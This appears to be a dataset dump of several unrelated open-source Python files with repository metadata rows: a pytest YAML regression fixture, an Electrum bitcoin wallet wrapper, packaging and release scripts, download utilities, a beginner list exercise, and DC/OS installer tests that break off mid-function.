ESSS/pytest-regressions | src/pytest_regressions/data_regression.py | 1 | 3451 | from functools import partial
import yaml
from pytest_regressions.common import Path, check_text_files, perform_regression_check
class DataRegressionFixture:
"""
Implementation of `data_regression` fixture.
"""
def __init__(self, datadir, original_datadir, request):
"""
:type datadir: Path
:type original_datadir: Path
:type request: FixtureRequest
"""
self.request = request
self.datadir = datadir
self.original_datadir = original_datadir
self.force_regen = False
def check(self, data_dict, basename=None, fullpath=None):
"""
Checks the given dict against a previously recorded version, or generate a new file.
:param dict data_dict: any yaml serializable dict.
:param str basename: basename of the file to test/record. If not given the name
of the test is used.
Use either `basename` or `fullpath`.
:param str fullpath: complete path to use as a reference file. This option
will ignore ``datadir`` fixture when reading *expected* files but will still use it to
write *obtained* files. Useful if a reference file is located in the session data dir for example.
``basename`` and ``fullpath`` are exclusive.
"""
__tracebackhide__ = True
def dump(filename):
"""Dump dict contents to the given filename"""
import yaml
dumped_str = yaml.dump_all(
[data_dict],
Dumper=RegressionYamlDumper,
default_flow_style=False,
allow_unicode=True,
indent=2,
encoding="utf-8",
)
with filename.open("wb") as f:
f.write(dumped_str)
perform_regression_check(
datadir=self.datadir,
original_datadir=self.original_datadir,
request=self.request,
check_fn=partial(check_text_files, encoding="UTF-8"),
dump_fn=dump,
extension=".yml",
basename=basename,
fullpath=fullpath,
force_regen=self.force_regen,
)
# non-PEP 8 alias used internally at ESSS
Check = check
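# Illustrative usage sketch (editor's addition, not part of the plugin): in a
# test module collected by pytest, the fixture is requested by name and the
# dict is compared against a YAML file stored next to the test.
def _example_usage(data_regression):  # hypothetical test function signature
    data_regression.check({"name": "example", "value": 1})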
class RegressionYamlDumper(yaml.SafeDumper):
"""
Custom YAML dumper aimed for regression testing. Differences to usual YAML dumper:
* Doesn't support aliases, as they produce confusing results on regression tests. The most
    definitive way to get rid of YAML aliases in the dump is to create a specialization that
never allows aliases, as there isn't an argument that offers same guarantee
(see http://pyyaml.org/ticket/91).
"""
def ignore_aliases(self, data):
return True
@classmethod
def add_custom_yaml_representer(cls, data_type, representer_fn):
"""
Add custom representer to regression YAML dumper. It is polymorphic, so it works also for
subclasses of `data_type`.
:param type data_type: Type of objects.
:param callable representer_fn: Function that receives ``(dumper, data)`` type as
argument and must must return a YAML-convertible representation.
"""
# Use multi-representer instead of simple-representer because it supports polymorphism.
yaml.add_multi_representer(
data_type, multi_representer=representer_fn, Dumper=cls
)
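# Illustrative usage sketch (editor's addition): register a representer for a
# custom type so it can appear in regression files; `MyValue` is hypothetical.
#
#     RegressionYamlDumper.add_custom_yaml_representer(
#         MyValue, lambda dumper, value: dumper.represent_str(str(value)))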
| mit | 7,882,442,899,186,516,000 | 33.858586 | 110 | 0.622718 | false |
Skynet2-0/Skynet2.0 | agent/Wallet.py | 1 | 4754 | """
Created on Apr 26, 2016
@author: niels
"""
from subprocess import PIPE, STDOUT
from BogusFormBuilder import BogusFormBuilder
import subprocess
import re
import os
import time
import sys
import pexpect
class Wallet(object):
"""
This class will manage the bitcoins going in and out off the agent.
"""
def __init__(self):
""" Constructor. """
output = pexpect.run('electrum listaddresses')
print(output)
        pattern = re.compile(r'\[\W*"[A-z0-9]+"\W*\]')  # the specific output for electrum if 1 address exists
print(pattern.search(output))
if(pattern.search(output)):
#if a wallet exists, initialize that one
print('using already existing wallet')
else:
self._create_wallet()
subprocess.call(['electrum', 'daemon', 'start'])
def _answer_prompt(self, child, answer):
"""
Wait for a prompt, then send the answer. Answering with '' is the same as no answer
child -- a result from pexpect.spawn and is thus of the pexpect.spawn class.
"""
#wait for prompt, then send answer
child.waitnoecho()
child.sendline(answer)
try:
child.read()
except:
pass #somethimes no output is generated, and eof would cash read...
def _create_wallet(self):
print('did not find an existing wallet, creating a new one')
#ensure the daemon is stopped, as this causes path errors (mostly usefull for development)
pexpect.run('electrum daemon stop')
#build a new wallet if no wallet yet exists
walletpair=str(subprocess.check_output('python addrgen/addrgen.py',shell=True))
walletpair = re.split('\W+', walletpair)
self.address = walletpair[1]
self.privkey = walletpair[2]
print('created a wallet with address \''+self.address+'\' and privatekey \''+self.privkey+'\'')
child = pexpect.spawn('electrum', ['restore', self.privkey])
#respectively: use default password, use default fee (0.002), use default gap limit and give seed
self._answer_prompt(child, '')
        # check if wallet was created successfully
command = """electrum listaddresses"""
output = pexpect.run(command)
walletFinder = re.compile(r'\[\W*"([A-z0-9]+)"\W*\]')
result = walletFinder.search(output)
#This horrible feedback loop is here due to a quirk of electrum.
#Needs refactoring, but do not refactor without extensive testing (i.e. multiple vps all from clean install)
        # Because electrum behaviour right after startup tends to differ from server to server (I suspect something to do with specs)
try:
            print(result.group(1))
return result.group(1)
except:
return self._create_wallet()
# def __del__(self):
# '''
# clear up the electrum service
# '''
# subprocess.call(['electrum', 'daemon', 'stop'])
def balance(self):
"""
Return the balance of the Btc wallet (i.e. confirmed balance+unconfirmed balance).
"""
balancesheet = str(subprocess.check_output(['electrum', 'getbalance']))
return self.calculateBalance(balancesheet)
def calculateBalance(self, balancesheet):
"""
        Given the output of 'electrum getbalance', calculate the actual balance.
"""
confirmedBalance = re.search('"confirmed": "([0-9.\-]+)"', balancesheet)
unconfirmedBalance = re.search('"unconfirmed": "([0-9.\-]+)"', balancesheet)
sum = 0.0
if confirmedBalance:
sum+=float(confirmedBalance.group(1))
if unconfirmedBalance:
sum+=float(unconfirmedBalance.group(1))
return sum
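    # Illustrative example (editor's addition): for a balancesheet string such
    # as '{"confirmed": "0.5", "unconfirmed": "-0.1"}' the regexes above pick
    # out 0.5 and -0.1, so calculateBalance would return 0.4.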
def canPay(self, amount, fee):
return float(amount)+float(fee)<=self.balance()
def payToAutomatically(self, address, amount):
"""
Make a payment using an automatically calculated fee.
address -- The address to transfer to.
amount -- The amount to transfer.
"""
if self.canPay(amount,'0.0'):
payment = str(subprocess.check_output(['electrum', 'payto', address, amount]))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
return True
return False
def send_everything_to(self, address):
"""
Transfers all available funds in the wallet to the specified address
address -- The address as string to transfer to
"""
payment = str(subprocess.check_output(['electrum', 'payto', str(address), '!']))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
def payTo(self, address, fee, amount):
"""
If funds allow, transfer amount in Btc to Address. With a fee for
processor.
address -- The address to pay to.
fee -- The fee to pay.
amount -- The amount to transfer.
"""
if self.canPay(amount, fee):
print(str(subprocess.call(['electrum', 'payto', '-f', fee, address, amount])))
| gpl-3.0 | 8,826,590,145,078,224,000 | 30.071895 | 126 | 0.689314 | false |
rabbitvcs/rabbitvcs | setup.py | 1 | 5870 | from __future__ import absolute_import
from __future__ import print_function
#!/usr/bin/env python
# If you didn't know already, this is a Python distutils setup script. It borrows
# heavily from Phatch's (see: http://photobatch.stani.be/).
#
# There's a lot of comments here (on purpose) so people can actually learn from
# this and don't have to figure out everything on their own.
#
# This setup script is used to build distribution specific packages.
#
# For more information see: http://docs.python.org/dist/dist.html
#
# TODO: this all feels just a little too shell scripty, refactoring it later
# might be a good idea.
# NOTES:
# System-wide directories:
# Scalable emblems go in: /usr/share/icons/hicolor/scalable/emblems
#
# User-specific directories:
# Scalable emblems go in: ~/.icons/hicolor/scalable
#
# Common directories
# See: http://standards.freedesktop.org/basedir-spec/basedir-spec-0.6.html
# Configuration information goes in: ~/.config/rabbitvcs/
# Data goes in: ~/.local/share/rabbitvcs
import sys
import os
import os.path
import subprocess
from distutils.core import setup
import distutils.sysconfig
PREFIX = sys.prefix
# If the user passed --prefix=... then use the new prefix
for c in sys.argv:
if c.startswith("--prefix="):
PREFIX = c.split("=", 1)[1].strip()
elif c == '--user':
PREFIX = os.path.expanduser("~/.local")
#==============================================================================
# Variables
#==============================================================================
# Some descriptive variables
# This will eventually be passed to the setup function, but we already need them
# for doing some other stuff so we have to declare them here.
name = "rabbitvcs"
version = "0.18"
description = "Easy version control"
long_description = """RabbitVCS is a set of graphical tools written to provide simple and straightforward access to the version control systems you use."""
author = "Adam Plumb"
author_email = "[email protected]"
url = "http://www.rabbitvcs.org"
license = "GNU General Public License version 2 or later"
#==============================================================================
# Paths
#==============================================================================
icon_theme_directory = "share/icons/hicolor"
locale_directory = "share/locale"
#==============================================================================
# Helper functions
#==============================================================================
def include_by_pattern(directory, directory_to_install, pattern):
files_to_include = []
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith(pattern):
files_to_include.append((
root.replace(directory, directory_to_install),
[os.path.join(root, file)]
))
return files_to_include
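# Illustrative example (editor's addition, hypothetical paths): a call like
# include_by_pattern("locale", locale_directory, ".mo") yields one
# (destination_dir, [source_file]) tuple per matching file, e.g.
# ("share/locale/fr/LC_MESSAGES", ["locale/fr/LC_MESSAGES/rabbitvcs.mo"]).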
#==============================================================================
# Gather all the files that need to be included
#==============================================================================
# Packages
packages = []
for root, dirs, files in os.walk("rabbitvcs"):
if "__init__.py" in files:
packages.append(root.replace(os.path.sep, "."))
# Translation
translations = include_by_pattern("locale", locale_directory, ".mo")
# Icons
icons = include_by_pattern("data/icons/hicolor", icon_theme_directory, ".svg")
icons += include_by_pattern("data/icons/hicolor", icon_theme_directory, ".png")
# Config parsing specification
config_spec = [(
"share/rabbitvcs",
["rabbitvcs/util/configspec/configspec.ini"]
)]
# Documentation
documentation = [("share/doc/rabbitvcs", [
"AUTHORS",
"MAINTAINERS"
])]
# Save build information so we can access the prefix later
path = "rabbitvcs/buildinfo.py"
buildinfo = '''rabbitvcs_prefix = "%s"
icon_path = "%s/%s"
''' % (PREFIX, PREFIX, icon_theme_directory)
fh = open(path, "w")
fh.write(buildinfo)
fh.close()
#==============================================================================
# Ready to install
#==============================================================================
# Calling the setup function will actually install RabbitVCS and also creates
# an .egg-info file in /usr/lib/python<version>/site-packages/ or
# /usr/share/python-support/rabbitvcs when generating a Debian package.
dist = setup(
# The following arguments will be included in the .egg.info file,
# for a list of available arguments and their descriptions see:
# - http://docs.python.org/dist/module-distutils.core.html
name=name,
version=version,
description=description,
long_description=long_description,
author=author,
author_email=author_email,
url=url,
license=license,
# There are actually several arguments that are used to install files:
# - py_modules: installs specific modules to site-packages
# - packages: install complete packages (directories with an __init__.py
# file) into site-packages
# - data_files: any file you want, anywhere you want it
packages=packages,
package_data={
"rabbitvcs": [
# Include our GtkBuilder UI files right into the package
"ui/xml/*.xml",
"ui/xml/dialogs/*.xml"
]
},
data_files=translations + icons + documentation + config_spec
)
#
# Post installation
#
# Make sure the icon cache is deleted and recreated
if sys.argv[1] == "install":
if os.uname()[0] != 'Darwin':
print("Running gtk-update-icon-cache")
subprocess.Popen(
["gtk-update-icon-cache", os.path.join(PREFIX, icon_theme_directory)],
stdout=subprocess.PIPE
).communicate()[0]
| gpl-2.0 | -7,958,066,994,226,009,000 | 33.127907 | 158 | 0.584838 | false |
hkkwok/MachOTool | utils/progress_indicator.py | 1 | 1267 | import sys
import datetime
class ProgressIndicator(object):
ENABLED = True
RECORDS = list()
def __init__(self, prompt, frequency):
self._display(prompt)
self._record(prompt + 'start')
self.prompt = prompt
self.frequency = frequency
self.count = 0
def click(self):
if (self.count % self.frequency) == 0:
self._display('.')
self.count += 1
def done(self):
self._display('\n')
self._record(self.prompt + 'done (%d entries)' % self.count)
@classmethod
def display(cls, fmt, *args):
if cls.ENABLED:
if len(args) == 0:
output = fmt
else:
output = fmt % tuple(args)
cls._display(output)
cls._record(output)
@classmethod
def _display(cls, output):
if cls.ENABLED:
sys.stdout.write(output)
sys.stdout.flush()
@classmethod
def _record(cls, event):
cls.RECORDS.append((datetime.datetime.now(), event))
@classmethod
def clear(cls):
cls.RECORDS = list()
@classmethod
def dump_records(cls):
for (timestamp, event) in cls.RECORDS:
print '%s: %s' % (str(timestamp), event)
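# Illustrative usage sketch (editor's addition):
#
#     progress = ProgressIndicator('parsing load commands', 100)
#     for item in items:          # `items` is hypothetical
#         progress.click()        # prints a dot every 100 clicks
#     progress.done()
#     ProgressIndicator.dump_records()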
| apache-2.0 | 1,150,852,479,338,861,800 | 23.365385 | 68 | 0.539069 | false |
minzhangcheng/MPL | MPL/Network/Download.py | 1 | 3810 | # ############################################################################
#
# Copyright (C) 2015 Minzhang Cheng
# Contact: [email protected]
#
# This file is part of the Minzhang's Python Library, a Python library with many utils by Minzhang Cheng.
#
# GNU Lesser General Public License Usage
# This file may be used under the terms of the GNU Lesser General Public
# License version 3 as published by the Free Software Foundation and
# appearing in the file LICENSE included in the packaging of this file.
# Please review the following information to ensure the GNU Lesser
# General Public License version 3 requirements will be met:
# http://www.gnu.org/licenses/gpl-3.0.html
#
# ############################################################################
import __future__
import ftplib
import requests
def ftpDownload(url, path, filename='', user='anonymous', password=''):
"""
##############################################################################
#
# ftpDownload(url, URL of ftp, pointing to a file
# path, The path to store downloaded file
# filename='', Filename, default to use the original name from ftp server
# user='anonymous', FTP user, default to use anonymous mode
# password='') FTP password, default to use anonymous mode
#
# Download one file from ftp server, with url like
# [ftp://][user:password]@ftphost[:port]/[path/]filename
#
##############################################################################
"""
url = url.strip(' \t\n')
if url[:6] == 'ftp://':
url = url[6:]
at = url.find('@')
if at >= 0:
(ftpUser, host) = url.rsplit('@', 1)
user = ftpUser
sep = ftpUser.find(':')
if sep >= 0:
(user, password) = ftpUser.split(':', 1)
else:
host = url
(host, ftpPath) = host.split('/', 1)
host = host.split(':')
if len(host) == 2:
        port = int(host[1])
host = host[0]
else:
port = 21
host = host[0]
sep = ftpPath.find('/')
if sep >= 0:
(ftpPath, name) = ftpPath.rsplit('/', 1)
else:
name = ftpPath
ftpPath = ''
if path[-1] != '/':
path += '/'
if filename == '':
filename = path + name
else:
filename = path + filename
ftp = ftplib.FTP()
ftp.connect(host, port)
ftp.login(user, password)
if ftpPath != '':
ftp.cwd(ftpPath)
outFile = open(filename, 'wb')
ftp.retrbinary('RETR %s' % name, outFile.write)
ftp.quit()
outFile.close()
return True
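# Illustrative usage (editor's addition; host and path are made up):
#
#     ftpDownload('ftp://ftp.example.org/pub/data.txt', '/tmp')
#
# downloads pub/data.txt anonymously and saves it as /tmp/data.txt.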
def httpDownload(url, path, filename=''):
"""
Download one file from http server.
httpDownload(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name
from http server
"""
if path[-1] not in '/':
path += '/'
if len(filename) == 0:
file = url.rsplit('/', 1)[-1]
file = path + file
else:
file = path + filename
req = requests.get(url)
outFile = open(file, 'wb')
outFile.write(req.content)
outFile.close()
return True
def download(url, path, filename=''):
"""
Download one file from remote server.
download(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name from
remote server
"""
if url[:6] == 'ftp://':
return ftpDownload(url, path, filename)
else:
return httpDownload(url, path, filename) | lgpl-3.0 | 6,221,154,197,156,404,000 | 30.237705 | 105 | 0.505512 | false |
denim2x/python-chess | release.py | 1 | 5726 | #!/usr/bin/python3
# Helper script to create and publish a new python-chess release.
import os
import chess
import sys
import zipfile
import textwrap
import configparser
import requests
import bs4
def system(command):
if 0 != os.system(command):
sys.exit(1)
def check_git():
print("--- CHECK GIT ----------------------------------------------------")
system("git diff --exit-code")
def test():
print("--- TEST ---------------------------------------------------------")
system("python2 test.py")
system("python3 test.py")
def doctest():
print("--- DOCTEST ------------------------------------------------------")
system("python2 -m doctest README.rst")
system("python3 -m doctest README.rst")
def check_changelog():
print("--- CHECK CHANGELOG ----------------------------------------------")
with open("CHANGELOG.rst", "r") as changelog_file:
changelog = changelog_file.read()
if "Upcoming in the next release" in changelog:
print("Found: Upcoming in the next release")
sys.exit(1)
tagname = "v{0}".format(chess.__version__)
if tagname not in changelog:
print("Not found: {0}".format(tagname))
sys.exit(1)
def check_docs():
print("--- CHECK DOCS ---------------------------------------------------")
system("python3 setup.py --long-description | rst2html --strict > /dev/null")
def benchmark():
print("--- BENCHMARK ----------------------------------------------------")
system("python2 benchmark.py")
system("python3 benchmark.py")
def tag_and_push():
print("--- TAG AND PUSH -------------------------------------------------")
tagname = "v{0}".format(chess.__version__)
release_filename = "release-{0}.txt".format(tagname)
if not os.path.exists(release_filename):
print(">>> Creating {0} ...".format(release_filename))
first_section = False
prev_line = None
with open(release_filename, "w") as release_txt, open("CHANGELOG.rst", "r") as changelog_file:
headline = "python-chess {0}".format(tagname)
release_txt.write(headline + os.linesep)
for line in changelog_file:
if not first_section:
if line.startswith("-------"):
first_section = True
else:
if line.startswith("-------"):
break
else:
if not prev_line.startswith("------"):
release_txt.write(prev_line)
prev_line = line
with open(release_filename, "r") as release_txt:
release = release_txt.read().strip() + os.linesep
print(release)
with open(release_filename, "w") as release_txt:
release_txt.write(release)
guessed_tagname = input(">>> Sure? Confirm tagname: ")
if guessed_tagname != tagname:
print("Actual tagname is: {0}".format(tagname))
sys.exit(1)
system("git tag {0} -s -F {1}".format(tagname, release_filename))
system("git push origin master {0}".format(tagname))
return tagname
def update_rtd():
print("--- UPDATE RTD ---------------------------------------------------")
system("curl -X POST http://readthedocs.org/build/python-chess")
def pypi():
print("--- PYPI ---------------------------------------------------------")
system("python3 setup.py sdist upload")
def pythonhosted(tagname):
print("--- PYTHONHOSTED -------------------------------------------------")
print("Creating pythonhosted.zip ...")
with zipfile.ZipFile("pythonhosted.zip", "w") as zip_file:
zip_file.writestr("index.html", textwrap.dedent("""\
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://python-chess.readthedocs.org/en/{0}/">
<script>
window.location.href = 'http://python-chess.readthedocs.org/en/{0}/';
</script>
</head>
</html>""".format(tagname)))
print("Getting credentials ...")
config = configparser.ConfigParser()
config.read(os.path.expanduser("~/.pypirc"))
username = config.get("pypi", "username")
password = config.get("pypi", "password")
auth = requests.auth.HTTPBasicAuth(username, password)
print("Username: {0}".format(username))
print("Getting CSRF token ...")
session = requests.Session()
res = session.get("https://pypi.python.org/pypi?:action=pkg_edit&name=python-chess", auth=auth)
if res.status_code != 200:
print(res.text)
print(res)
sys.exit(1)
soup = bs4.BeautifulSoup(res.text, "html.parser")
csrf = soup.find("input", {"name": "CSRFToken"})["value"]
print("CSRF: {0}".format(csrf))
print("Uploading ...")
with open("pythonhosted.zip", "rb") as zip_file:
res = session.post("https://pypi.python.org/pypi", auth=auth, data={
"CSRFToken": csrf,
":action": "doc_upload",
"name": "python-chess",
}, files={
"content": zip_file,
})
    if res.status_code != 200 or tagname not in res.text:
print(res.text)
print(res)
sys.exit(1)
print("Done.")
def github_release(tagname):
print("--- GITHUB RELEASE -----------------------------------------------")
print("https://github.com/niklasf/python-chess/releases/tag/{0}".format(tagname))
if __name__ == "__main__":
check_git()
check_docs()
check_changelog()
test()
doctest()
benchmark()
tagname = tag_and_push()
update_rtd()
pypi()
pythonhosted(tagname)
github_release(tagname)
| gpl-3.0 | 6,621,367,582,515,650,000 | 30.461538 | 103 | 0.520608 | false |
debugger06/MiroX | linux/plat/options.py | 1 | 3688 | # Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
"""miro.plat.options -- Holds platform-specific command line options.
Most/all of these are set in the miro.real script. The values here are
hopefully sane defaults.
"""
# these have no related prefs
shouldSyncX = False
frontend = 'html'
themeName = None
gconf_name = None
user_home = "~/"
override_dimensions = None
from miro.prefs import Pref
class LinuxPref(Pref):
def __init__(self, key, default, alias, helptext):
Pref.__init__(self, key, default, False, None, None)
self.alias = alias
self.helptext = helptext
FFMPEG_BINARY = LinuxPref(
key="ffmpegBinary",
default="/usr/bin/ffmpeg",
alias="ffmpeg",
helptext="Absolute path for ffmpeg binary.")
FFMPEG2THEORA_BINARY = LinuxPref(
key="ffmpeg2TheoraBinary",
default="/usr/bin/ffmpeg2theora",
alias="ffmpeg2theora",
helptext="Absolute path for ffmpeg2theora binary.")
FIRST_TIME = LinuxPref(
key="startupTasksDone",
default=True,
alias="firsttimestartup",
helptext="If False, Miro shows first time startup dialog.")
USE_RENDERER = LinuxPref(
key="useRenderer",
default=u"gstreamer",
alias="renderer",
helptext="Which renderer to use. (gstreamer, ...)")
GSTREAMER_IMAGESINK = LinuxPref(
key="DefaultGstreamerImagesink",
default="gconfvideosink",
alias="gstreamer-imagesink",
helptext=("Which GStreamer image sink to use for video. "
"(autovideosink, ximagesink, xvimagesink, gconfvideosink, ...)"))
GSTREAMER_AUDIOSINK = LinuxPref(
key="DefaultGstreamerAudiosink",
default="gconfaudiosink",
alias="gstreamer-audiosink",
helptext=("Which GStreamer sink to use for audio. "
"(autoaudiosink, osssink, alsasink, gconfaudiosink, ...)"))
SHOW_TRAYICON = Pref(
key="showTrayicon",
default=True,
platformSpecific=False)
WINDOWS_ICON = Pref(
key='windowsIcon',
default=None,
# this is platform specific, but if we set this to True then it
# won't look up the value in the theme's app.config file
platformSpecific=False)
# build a lookup for preferences by alias
PREFERENCES = {}
for mem in dir():
p = locals()[mem]
if isinstance(p, Pref) and hasattr(p, "alias"):
PREFERENCES[p.alias] = p
| gpl-2.0 | 1,548,895,991,307,455,500 | 33.46729 | 79 | 0.714208 | false |
mahmoudhossam/Google-Python-Exercises | basic/list1.py | 1 | 3144 | #!/usr/bin/python2 -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Basic list exercises
# Fill in the code for the functions below. main() is already set up
# to call the functions with a few different inputs,
# printing 'OK' when each function is correct.
# The starter code for each function includes a 'return'
# which is just a placeholder for your code.
# It's ok if you do not complete all the functions, and there
# are some additional functions to try in list2.py.
# A. match_ends
# Given a list of strings, return the count of the number of
# strings where the string length is 2 or more and the first
# and last chars of the string are the same.
# Note: python does not have a ++ operator, but += works.
def match_ends(words):
result = 0
for i in words:
if len(i) >= 2 and i[0] == i[len(i)-1]:
result += 1
return result
# B. front_x
# Given a list of strings, return a list with the strings
# in sorted order, except group all the strings that begin with 'x' first.
# e.g. ['mix', 'xyz', 'apple', 'xanadu', 'aardvark'] yields
# ['xanadu', 'xyz', 'aardvark', 'apple', 'mix']
# Hint: this can be done by making 2 lists and sorting each of them
# before combining them.
def front_x(words):
xs = []
non_x = []
for i in words:
if i.startswith('x'):
xs.append(i)
else:
non_x.append(i)
return sorted(xs) + sorted(non_x)
# C. sort_last
# Given a list of non-empty tuples, return a list sorted in increasing
# order by the last element in each tuple.
# e.g. [(1, 7), (1, 3), (3, 4, 5), (2, 2)] yields
# [(2, 2), (1, 3), (3, 4, 5), (1, 7)]
# Hint: use a custom key= function to extract the last element from each tuple.
def _get_key(tpl):
return tpl[len(tpl) - 1]
def sort_last(tuples):
return sorted(tuples, key=_get_key)
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print '%s got: %s expected: %s' % (prefix, repr(got), repr(expected))
# Calls the above functions with interesting inputs.
def main():
print 'match_ends'
test(match_ends(['aba', 'xyz', 'aa', 'x', 'bbb']), 3)
test(match_ends(['', 'x', 'xy', 'xyx', 'xx']), 2)
test(match_ends(['aaa', 'be', 'abc', 'hello']), 1)
print
print 'front_x'
test(front_x(['bbb', 'ccc', 'axx', 'xzz', 'xaa']),
['xaa', 'xzz', 'axx', 'bbb', 'ccc'])
test(front_x(['ccc', 'bbb', 'aaa', 'xcc', 'xaa']),
['xaa', 'xcc', 'aaa', 'bbb', 'ccc'])
test(front_x(['mix', 'xyz', 'apple', 'xanadu', 'aardvark']),
['xanadu', 'xyz', 'aardvark', 'apple', 'mix'])
print
print 'sort_last'
test(sort_last([(1, 3), (3, 2), (2, 1)]),
[(2, 1), (3, 2), (1, 3)])
test(sort_last([(2, 3), (1, 2), (3, 1)]),
[(3, 1), (1, 2), (2, 3)])
test(sort_last([(1, 7), (1, 3), (3, 4, 5), (2, 2)]),
[(2, 2), (1, 3), (3, 4, 5), (1, 7)])
if __name__ == '__main__':
main()
| apache-2.0 | 2,616,948,283,795,058,700 | 30.44 | 79 | 0.604326 | false |
lingmann/dcos | dcos_installer/test_backend.py | 1 | 12788 | import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
if not os.path.exists('dcos-release.config.yaml'):
pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
return release.load_config('dcos-release.config.yaml')
@pytest.fixture(scope='module')
def config_testing(config):
if 'testing' not in config:
pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
return config['testing']
@pytest.fixture(scope='module')
def config_aws(config_testing):
if 'aws' not in config_testing:
pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
return config_testing['aws']
def test_password_hash():
"""Tests that the password hashing method creates de-cryptable hash
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
"""Test that --set-superuser-hash works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visible in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.10.0-beta2',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
    # Initialize with defaults
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
